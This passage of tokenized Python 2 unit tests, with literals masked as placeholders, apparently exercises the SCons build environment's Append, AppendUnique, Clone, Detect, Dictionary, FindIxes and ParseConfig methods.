<EOL> '<STR_LIT>' , [ ] , [ ] , <EOL> '<STR_LIT>' , UL ( [ ] ) , UL ( [ ] ) , <EOL> '<STR_LIT>' , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> [ ] , '<STR_LIT>' , [ '<STR_LIT>' ] , <EOL> [ ] , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , <EOL> [ ] , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> [ ] , '<STR_LIT>' , [ ] , <EOL> [ ] , [ ] , [ ] , <EOL> [ ] , UL ( [ ] ) , UL ( [ ] ) , <EOL> [ ] , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , <EOL> [ ] , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ ] ) , '<STR_LIT>' , [ '<STR_LIT:O>' , '<STR_LIT:1>' ] , <EOL> UL ( [ ] ) , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , <EOL> UL 
( [ ] ) , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ ] ) , '<STR_LIT>' , UL ( [ ] ) , <EOL> UL ( [ ] ) , [ ] , UL ( [ ] ) , <EOL> UL ( [ ] ) , UL ( [ ] ) , UL ( [ ] ) , <EOL> UL ( [ ] ) , [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ ] ) , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> [ '<STR_LIT>' ] , '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> [ '<STR_LIT>' ] , '<STR_LIT>' , [ '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , [ ] , [ '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , UL ( [ ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:1>' ] , <EOL> UL ( [ '<STR_LIT>' ] ) , [ '<STR_LIT>' ] , [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , '<STR_LIT>' , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , [ ] , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , UL ( [ ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> ] <EOL> env = Environment ( ) <EOL> failed = <NUM_LIT:0> <EOL> while cases : <EOL> input , append , expect = cases [ : <NUM_LIT:3> ] <EOL> env [ '<STR_LIT>' ] = copy . copy ( input ) <EOL> try : <EOL> env . 
Append ( XXX = append ) <EOL> except Exception , e : <EOL> if failed == <NUM_LIT:0> : print <EOL> print "<STR_LIT>" % ( repr ( input ) , repr ( append ) , e ) <EOL> failed = failed + <NUM_LIT:1> <EOL> else : <EOL> result = env [ '<STR_LIT>' ] <EOL> if result != expect : <EOL> if failed == <NUM_LIT:0> : print <EOL> print "<STR_LIT>" % ( repr ( input ) , repr ( append ) , repr ( result ) , repr ( expect ) ) <EOL> failed = failed + <NUM_LIT:1> <EOL> del cases [ : <NUM_LIT:3> ] <EOL> assert failed == <NUM_LIT:0> , "<STR_LIT>" % failed <EOL> env [ '<STR_LIT>' ] = UL ( [ '<STR_LIT:foo>' ] ) <EOL> env . Append ( UL = '<STR_LIT:bar>' ) <EOL> result = env [ '<STR_LIT>' ] <EOL> assert isinstance ( result , UL ) , repr ( result ) <EOL> assert result == [ '<STR_LIT:foo>' , '<STR_LIT:b>' , '<STR_LIT:a>' , '<STR_LIT:r>' ] , result <EOL> env [ '<STR_LIT>' ] = CLVar ( [ '<STR_LIT:foo>' ] ) <EOL> env . Append ( CLVar = '<STR_LIT:bar>' ) <EOL> result = env [ '<STR_LIT>' ] <EOL> assert isinstance ( result , CLVar ) , repr ( result ) <EOL> assert result == [ '<STR_LIT:foo>' , '<STR_LIT:bar>' ] , result <EOL> class C : <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> def __str__ ( self ) : <EOL> return self . name <EOL> def __cmp__ ( self , other ) : <EOL> raise "<STR_LIT>" <EOL> ccc = C ( '<STR_LIT>' ) <EOL> env2 = self . TestEnvironment ( CCC1 = [ '<STR_LIT>' ] , CCC2 = ccc ) <EOL> env2 . Append ( CCC1 = ccc , CCC2 = [ '<STR_LIT>' ] ) <EOL> assert env2 [ '<STR_LIT>' ] [ <NUM_LIT:0> ] == '<STR_LIT>' , env2 [ '<STR_LIT>' ] <EOL> assert env2 [ '<STR_LIT>' ] [ <NUM_LIT:1> ] is ccc , env2 [ '<STR_LIT>' ] <EOL> assert env2 [ '<STR_LIT>' ] [ <NUM_LIT:0> ] is ccc , env2 [ '<STR_LIT>' ] <EOL> assert env2 [ '<STR_LIT>' ] [ <NUM_LIT:1> ] == '<STR_LIT>' , env2 [ '<STR_LIT>' ] <EOL> env3 = self . TestEnvironment ( X = { '<STR_LIT>' : <NUM_LIT:7> } ) <EOL> env3 . 
Append ( X = { '<STR_LIT>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:9> } , Y = { '<STR_LIT>' : <NUM_LIT:10> } ) <EOL> assert env3 [ '<STR_LIT:X>' ] == { '<STR_LIT>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:9> } , env3 [ '<STR_LIT:X>' ] <EOL> assert env3 [ '<STR_LIT:Y>' ] == { '<STR_LIT>' : <NUM_LIT:10> } , env3 [ '<STR_LIT:Y>' ] <EOL> env4 = self . TestEnvironment ( BUILDERS = { '<STR_LIT>' : <NUM_LIT:11> } ) <EOL> env4 . Append ( BUILDERS = { '<STR_LIT>' : <NUM_LIT:12> } ) <EOL> assert env4 [ '<STR_LIT>' ] == { '<STR_LIT>' : <NUM_LIT:11> , '<STR_LIT>' : <NUM_LIT:12> } , env4 [ '<STR_LIT>' ] <EOL> assert hasattr ( env4 , '<STR_LIT>' ) <EOL> assert hasattr ( env4 , '<STR_LIT>' ) <EOL> def test_AppendENVPath ( self ) : <EOL> """<STR_LIT>""" <EOL> env1 = self . TestEnvironment ( ENV = { '<STR_LIT>' : r'<STR_LIT>' } , <EOL> MYENV = { '<STR_LIT>' : r'<STR_LIT>' } ) <EOL> env1 . AppendENVPath ( '<STR_LIT>' , r'<STR_LIT>' , sep = '<STR_LIT:;>' ) <EOL> env1 . AppendENVPath ( '<STR_LIT>' , r'<STR_LIT>' , sep = '<STR_LIT:;>' ) <EOL> env1 . AppendENVPath ( '<STR_LIT>' , r'<STR_LIT>' , '<STR_LIT>' , sep = '<STR_LIT:;>' ) <EOL> env1 . AppendENVPath ( '<STR_LIT>' , r'<STR_LIT>' , '<STR_LIT>' , sep = '<STR_LIT:;>' ) <EOL> env1 . AppendENVPath ( '<STR_LIT>' , r'<STR_LIT>' , '<STR_LIT>' , sep = '<STR_LIT:;>' , delete_existing = <NUM_LIT:0> ) <EOL> assert ( env1 [ '<STR_LIT>' ] [ '<STR_LIT>' ] == r'<STR_LIT>' ) <EOL> assert ( env1 [ '<STR_LIT>' ] [ '<STR_LIT>' ] == r'<STR_LIT>' ) <EOL> test = TestCmd . TestCmd ( workdir = '<STR_LIT>' ) <EOL> test . subdir ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> p = env1 [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> env1 . AppendENVPath ( '<STR_LIT>' , '<STR_LIT>' , sep = '<STR_LIT:;>' ) <EOL> env1 . AppendENVPath ( '<STR_LIT>' , env1 . fs . 
Dir ( '<STR_LIT>' ) , sep = '<STR_LIT:;>' ) <EOL> assert env1 [ '<STR_LIT>' ] [ '<STR_LIT>' ] == p + '<STR_LIT>' , env1 [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> def test_AppendUnique ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( AAA1 = '<STR_LIT>' , <EOL> AAA2 = '<STR_LIT>' , <EOL> AAA3 = '<STR_LIT>' , <EOL> AAA4 = '<STR_LIT>' , <EOL> AAA5 = '<STR_LIT>' , <EOL> BBB1 = [ '<STR_LIT>' ] , <EOL> BBB2 = [ '<STR_LIT>' ] , <EOL> BBB3 = [ '<STR_LIT>' ] , <EOL> BBB4 = [ '<STR_LIT>' ] , <EOL> BBB5 = [ '<STR_LIT>' ] , <EOL> CCC1 = '<STR_LIT>' , <EOL> CCC2 = '<STR_LIT>' , <EOL> DDD1 = [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' ] ) <EOL> env . AppendUnique ( AAA1 = '<STR_LIT>' , <EOL> AAA2 = [ '<STR_LIT>' ] , <EOL> AAA3 = [ '<STR_LIT>' , '<STR_LIT:b>' , '<STR_LIT:c>' , '<STR_LIT:c>' , '<STR_LIT:b>' , '<STR_LIT>' ] , <EOL> AAA4 = '<STR_LIT>' , <EOL> AAA5 = [ '<STR_LIT>' ] , <EOL> BBB1 = '<STR_LIT>' , <EOL> BBB2 = [ '<STR_LIT>' ] , <EOL> BBB3 = [ '<STR_LIT>' , '<STR_LIT:c>' , '<STR_LIT:d>' , '<STR_LIT:c>' , '<STR_LIT>' ] , <EOL> BBB4 = '<STR_LIT>' , <EOL> BBB5 = [ '<STR_LIT>' ] , <EOL> CCC1 = '<STR_LIT>' , <EOL> CCC2 = [ '<STR_LIT>' ] , <EOL> DDD1 = '<STR_LIT:b>' ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT:b>' , '<STR_LIT:c>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT:c>' , '<STR_LIT:d>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , 
'<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' ] , env [ '<STR_LIT>' ] <EOL> env . AppendUnique ( DDD1 = '<STR_LIT:b>' , delete_existing = <NUM_LIT:1> ) <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT:a>' , '<STR_LIT:c>' , '<STR_LIT:b>' ] , env [ '<STR_LIT>' ] <EOL> env . AppendUnique ( DDD1 = [ '<STR_LIT:a>' , '<STR_LIT:b>' ] , delete_existing = <NUM_LIT:1> ) <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT:c>' , '<STR_LIT:a>' , '<STR_LIT:b>' ] , env [ '<STR_LIT>' ] <EOL> env . AppendUnique ( DDD1 = [ '<STR_LIT:e>' , '<STR_LIT:f>' , '<STR_LIT:e>' ] , delete_existing = <NUM_LIT:1> ) <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT:c>' , '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:f>' , '<STR_LIT:e>' ] , env [ '<STR_LIT>' ] <EOL> env [ '<STR_LIT>' ] = CLVar ( [ ] ) <EOL> env . AppendUnique ( CLVar = '<STR_LIT:bar>' ) <EOL> result = env [ '<STR_LIT>' ] <EOL> if sys . version [ <NUM_LIT:0> ] == '<STR_LIT:1>' or sys . version [ : <NUM_LIT:3> ] == '<STR_LIT>' : <EOL> assert result == '<STR_LIT:bar>' , result <EOL> else : <EOL> assert isinstance ( result , CLVar ) , repr ( result ) <EOL> assert result == [ '<STR_LIT:bar>' ] , result <EOL> env [ '<STR_LIT>' ] = CLVar ( [ '<STR_LIT:abc>' ] ) <EOL> env . AppendUnique ( CLVar = '<STR_LIT:bar>' ) <EOL> result = env [ '<STR_LIT>' ] <EOL> assert isinstance ( result , CLVar ) , repr ( result ) <EOL> assert result == [ '<STR_LIT:abc>' , '<STR_LIT:bar>' ] , result <EOL> env [ '<STR_LIT>' ] = CLVar ( [ '<STR_LIT:bar>' ] ) <EOL> env . AppendUnique ( CLVar = '<STR_LIT:bar>' ) <EOL> result = env [ '<STR_LIT>' ] <EOL> assert isinstance ( result , CLVar ) , repr ( result ) <EOL> assert result == [ '<STR_LIT:bar>' ] , result <EOL> def test_Clone ( self ) : <EOL> """<STR_LIT>""" <EOL> env1 = self . 
TestEnvironment ( XXX = '<STR_LIT:x>' , YYY = '<STR_LIT:y>' ) <EOL> env2 = env1 . Clone ( ) <EOL> env1copy = env1 . Clone ( ) <EOL> assert env1copy == env1copy <EOL> assert env2 == env2 <EOL> env2 . Replace ( YYY = '<STR_LIT>' ) <EOL> assert env2 == env2 <EOL> assert env1 != env2 <EOL> assert env1 == env1copy <EOL> env3 = env1 . Clone ( XXX = '<STR_LIT>' , ZZZ = '<STR_LIT>' ) <EOL> assert env3 == env3 <EOL> assert env3 . Dictionary ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> assert env3 . Dictionary ( '<STR_LIT>' ) == '<STR_LIT:y>' <EOL> assert env3 . Dictionary ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> assert env1 == env1copy <EOL> class TestA : <EOL> pass <EOL> env1 = self . TestEnvironment ( XXX = TestA ( ) , YYY = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , <EOL> ZZZ = { <NUM_LIT:1> : <NUM_LIT:2> , <NUM_LIT:3> : <NUM_LIT:4> } ) <EOL> env2 = env1 . Clone ( ) <EOL> env2 . Dictionary ( '<STR_LIT>' ) . append ( <NUM_LIT:4> ) <EOL> env2 . Dictionary ( '<STR_LIT>' ) [ <NUM_LIT:5> ] = <NUM_LIT:6> <EOL> assert env1 . Dictionary ( '<STR_LIT>' ) is env2 . Dictionary ( '<STR_LIT>' ) <EOL> assert <NUM_LIT:4> in env2 . Dictionary ( '<STR_LIT>' ) <EOL> assert not <NUM_LIT:4> in env1 . Dictionary ( '<STR_LIT>' ) <EOL> assert env2 . Dictionary ( '<STR_LIT>' ) . has_key ( <NUM_LIT:5> ) <EOL> assert not env1 . Dictionary ( '<STR_LIT>' ) . has_key ( <NUM_LIT:5> ) <EOL> env1 = self . TestEnvironment ( BUILDERS = { '<STR_LIT>' : <NUM_LIT:1> } ) <EOL> assert hasattr ( env1 , '<STR_LIT>' ) , "<STR_LIT>" <EOL> assert env1 . b1 . object == env1 , "<STR_LIT>" <EOL> env2 = env1 . Clone ( BUILDERS = { '<STR_LIT>' : <NUM_LIT:2> } ) <EOL> assert env2 is env2 <EOL> assert env2 == env2 <EOL> assert hasattr ( env1 , '<STR_LIT>' ) , "<STR_LIT>" <EOL> assert env1 . b1 . object == env1 , "<STR_LIT>" <EOL> assert not hasattr ( env2 , '<STR_LIT>' ) , "<STR_LIT>" <EOL> assert hasattr ( env2 , '<STR_LIT>' ) , "<STR_LIT>" <EOL> assert env2 . b2 . 
object == env2 , "<STR_LIT>" <EOL> def foo ( env ) : env [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> def bar ( env ) : env [ '<STR_LIT>' ] = <NUM_LIT:2> <EOL> def baz ( env ) : env [ '<STR_LIT>' ] = <NUM_LIT:3> <EOL> env1 = self . TestEnvironment ( tools = [ foo ] ) <EOL> env2 = env1 . Clone ( ) <EOL> env3 = env1 . Clone ( tools = [ bar , baz ] ) <EOL> assert env1 . get ( '<STR_LIT>' ) is <NUM_LIT:1> <EOL> assert env1 . get ( '<STR_LIT>' ) is None <EOL> assert env1 . get ( '<STR_LIT>' ) is None <EOL> assert env2 . get ( '<STR_LIT>' ) is <NUM_LIT:1> <EOL> assert env2 . get ( '<STR_LIT>' ) is None <EOL> assert env2 . get ( '<STR_LIT>' ) is None <EOL> assert env3 . get ( '<STR_LIT>' ) is <NUM_LIT:1> <EOL> assert env3 . get ( '<STR_LIT>' ) is <NUM_LIT:2> <EOL> assert env3 . get ( '<STR_LIT>' ) is <NUM_LIT:3> <EOL> env1 = self . TestEnvironment ( CCFLAGS = '<STR_LIT>' , XYZ = '<STR_LIT>' ) <EOL> env2 = env1 . Clone ( CCFLAGS = '<STR_LIT>' , <EOL> XYZ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> x = env2 . get ( '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> x = env2 . get ( '<STR_LIT>' ) <EOL> assert x == [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , x <EOL> env1 = self . TestEnvironment ( FLAGS = CLVar ( '<STR_LIT>' ) ) <EOL> x = env1 . get ( '<STR_LIT>' ) <EOL> assert x == [ '<STR_LIT>' , '<STR_LIT>' ] , x <EOL> env2 = env1 . Clone ( ) <EOL> env2 . Append ( FLAGS = '<STR_LIT>' ) <EOL> x = env2 . get ( '<STR_LIT>' ) <EOL> assert x == [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , x <EOL> test = TestCmd . TestCmd ( workdir = '<STR_LIT>' ) <EOL> test . write ( '<STR_LIT>' , """<STR_LIT>""" ) <EOL> test . write ( '<STR_LIT>' , """<STR_LIT>""" ) <EOL> env = self . TestEnvironment ( tools = [ '<STR_LIT>' ] , toolpath = [ test . workpath ( '<STR_LIT>' ) ] ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> env = env . 
Clone ( tools = [ '<STR_LIT>' ] ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> real_value = [ <NUM_LIT:4> ] <EOL> def my_tool ( env , rv = real_value ) : <EOL> assert env [ '<STR_LIT>' ] == rv [ <NUM_LIT:0> ] <EOL> env [ '<STR_LIT>' ] = rv [ <NUM_LIT:0> ] + <NUM_LIT:1> <EOL> env = self . TestEnvironment ( ) <EOL> real_value [ <NUM_LIT:0> ] = <NUM_LIT:5> <EOL> env = env . Clone ( KEY_THAT_I_WANT = <NUM_LIT:5> , tools = [ my_tool ] ) <EOL> assert env [ '<STR_LIT>' ] == real_value [ <NUM_LIT:0> ] , env [ '<STR_LIT>' ] <EOL> real_value [ <NUM_LIT:0> ] = <NUM_LIT:6> <EOL> env = env . Clone ( KEY_THAT_I_WANT = <NUM_LIT:6> , tools = [ my_tool ] ) <EOL> assert env [ '<STR_LIT>' ] == real_value [ <NUM_LIT:0> ] , env [ '<STR_LIT>' ] <EOL> def test_Copy ( self ) : <EOL> """<STR_LIT>""" <EOL> env1 = self . TestEnvironment ( XXX = '<STR_LIT:x>' , YYY = '<STR_LIT:y>' ) <EOL> env2 = env1 . Copy ( ) <EOL> env1copy = env1 . Copy ( ) <EOL> assert env1copy == env1copy <EOL> assert env2 == env2 <EOL> env2 . Replace ( YYY = '<STR_LIT>' ) <EOL> assert env2 == env2 <EOL> assert env1 != env2 <EOL> assert env1 == env1copy <EOL> def test_Detect ( self ) : <EOL> """<STR_LIT>""" <EOL> test = TestCmd . TestCmd ( workdir = '<STR_LIT>' ) <EOL> test . subdir ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> sub1 = test . workpath ( '<STR_LIT>' ) <EOL> sub2 = test . workpath ( '<STR_LIT>' ) <EOL> if sys . platform == '<STR_LIT:win32>' : <EOL> test . write ( [ '<STR_LIT>' , '<STR_LIT>' ] , "<STR_LIT>" ) <EOL> test . write ( [ '<STR_LIT>' , '<STR_LIT>' ] , "<STR_LIT>" ) <EOL> env = self . TestEnvironment ( ENV = { '<STR_LIT>' : [ sub1 , sub2 ] } ) <EOL> x = env . Detect ( '<STR_LIT>' ) <EOL> assert x is None , x <EOL> test . write ( [ '<STR_LIT>' , '<STR_LIT>' ] , "<STR_LIT>" ) <EOL> env = self . TestEnvironment ( ENV = { '<STR_LIT>' : [ sub1 , sub2 ] } ) <EOL> x = env . Detect ( '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> test . 
write ( [ '<STR_LIT>' , '<STR_LIT>' ] , "<STR_LIT>" ) <EOL> x = env . Detect ( '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> else : <EOL> test . write ( [ '<STR_LIT>' , '<STR_LIT>' ] , "<STR_LIT>" ) <EOL> test . write ( [ '<STR_LIT>' , '<STR_LIT>' ] , "<STR_LIT>" ) <EOL> env = self . TestEnvironment ( ENV = { '<STR_LIT>' : [ sub1 , sub2 ] } ) <EOL> x = env . Detect ( '<STR_LIT>' ) <EOL> assert x is None , x <EOL> sub2_xxx_exe = test . workpath ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> os . chmod ( sub2_xxx_exe , <NUM_LIT:0> <NUM_LIT> ) <EOL> env = self . TestEnvironment ( ENV = { '<STR_LIT>' : [ sub1 , sub2 ] } ) <EOL> x = env . Detect ( '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> sub1_xxx_exe = test . workpath ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> os . chmod ( sub1_xxx_exe , <NUM_LIT:0> <NUM_LIT> ) <EOL> x = env . Detect ( '<STR_LIT>' ) <EOL> assert x == '<STR_LIT>' , x <EOL> env = self . TestEnvironment ( ENV = { '<STR_LIT>' : [ ] } ) <EOL> x = env . Detect ( '<STR_LIT>' ) <EOL> assert x is None , x <EOL> def test_Dictionary ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( XXX = '<STR_LIT:x>' , YYY = '<STR_LIT:y>' , ZZZ = '<STR_LIT:z>' ) <EOL> assert env . Dictionary ( '<STR_LIT>' ) == '<STR_LIT:x>' <EOL> assert env . Dictionary ( '<STR_LIT>' ) == '<STR_LIT:y>' <EOL> assert env . Dictionary ( '<STR_LIT>' , '<STR_LIT>' ) == [ '<STR_LIT:x>' , '<STR_LIT:z>' ] <EOL> xxx , zzz = env . Dictionary ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert xxx == '<STR_LIT:x>' <EOL> assert zzz == '<STR_LIT:z>' <EOL> assert env . Dictionary ( ) . has_key ( '<STR_LIT>' ) <EOL> assert env . Dictionary ( ) . has_key ( '<STR_LIT>' ) <EOL> assert env . Dictionary ( ) . has_key ( '<STR_LIT>' ) <EOL> assert env . Dictionary ( ) . has_key ( '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:x>' <EOL> env [ '<STR_LIT>' ] = '<STR_LIT:foo>' <EOL> assert env . Dictionary ( '<STR_LIT>' ) == '<STR_LIT:foo>' <EOL> del env [ '<STR_LIT>' ] <EOL> assert not env . 
Dictionary ( ) . has_key ( '<STR_LIT>' ) <EOL> def test_FindIxes ( self ) : <EOL> "<STR_LIT>" <EOL> env = self . TestEnvironment ( LIBPREFIX = '<STR_LIT>' , <EOL> LIBSUFFIX = '<STR_LIT>' , <EOL> SHLIBPREFIX = '<STR_LIT>' , <EOL> SHLIBSUFFIX = '<STR_LIT>' , <EOL> PREFIX = '<STR_LIT>' , <EOL> SUFFIX = '<STR_LIT>' ) <EOL> paths = [ os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> assert paths [ <NUM_LIT:0> ] == env . FindIxes ( paths , '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert paths [ <NUM_LIT:1> ] == env . FindIxes ( paths , '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert None == env . FindIxes ( paths , '<STR_LIT>' , '<STR_LIT:POST>' ) <EOL> paths = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> assert paths [ <NUM_LIT:0> ] == env . FindIxes ( paths , '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert None == env . FindIxes ( paths , '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert paths [ <NUM_LIT:1> ] == env . FindIxes ( paths , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_ParseConfig ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( COMMAND = '<STR_LIT>' , <EOL> ASFLAGS = '<STR_LIT>' , <EOL> CCFLAGS = [ '<STR_LIT>' ] , <EOL> CPPDEFINES = [ ] , <EOL> CPPFLAGS = [ '<STR_LIT>' ] , <EOL> CPPPATH = '<STR_LIT:string>' , <EOL> FRAMEWORKPATH = [ ] , <EOL> FRAMEWORKS = [ ] , <EOL> LIBPATH = [ '<STR_LIT:list>' ] , <EOL> LIBS = '<STR_LIT>' , <EOL> LINKFLAGS = [ '<STR_LIT>' ] , <EOL> RPATH = [ ] ) <EOL> orig_backtick = env . backtick <EOL> class my_backtick : <EOL> def __init__ ( self , save_command , output ) : <EOL> self . save_command = save_command <EOL> self . output = output <EOL> def __call__ ( self , command ) : <EOL> self . save_command . append ( command ) <EOL> return self . output <EOL> try : <EOL> save_command = [ ] <EOL> env . 
backtick = my_backtick ( save_command , <EOL> "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" ) <EOL> env . ParseConfig ( "<STR_LIT>" ) <EOL> assert save_command == [ '<STR_LIT>' ] , save_command <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT:value>' ] ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT:string>' , '<STR_LIT>' , '<STR_LIT:bar>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT:list>' , '<STR_LIT>' , '<STR_LIT:foo>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' , env . File ( '<STR_LIT:abc>' ) ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> env . backtick = my_backtick ( [ ] , "<STR_LIT>" ) <EOL> env . ParseConfig ( "<STR_LIT>" ) <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT:string>' , '<STR_LIT>' , '<STR_LIT:bar>' ] , env [ '<STR_LIT>' ] <EOL> env . 
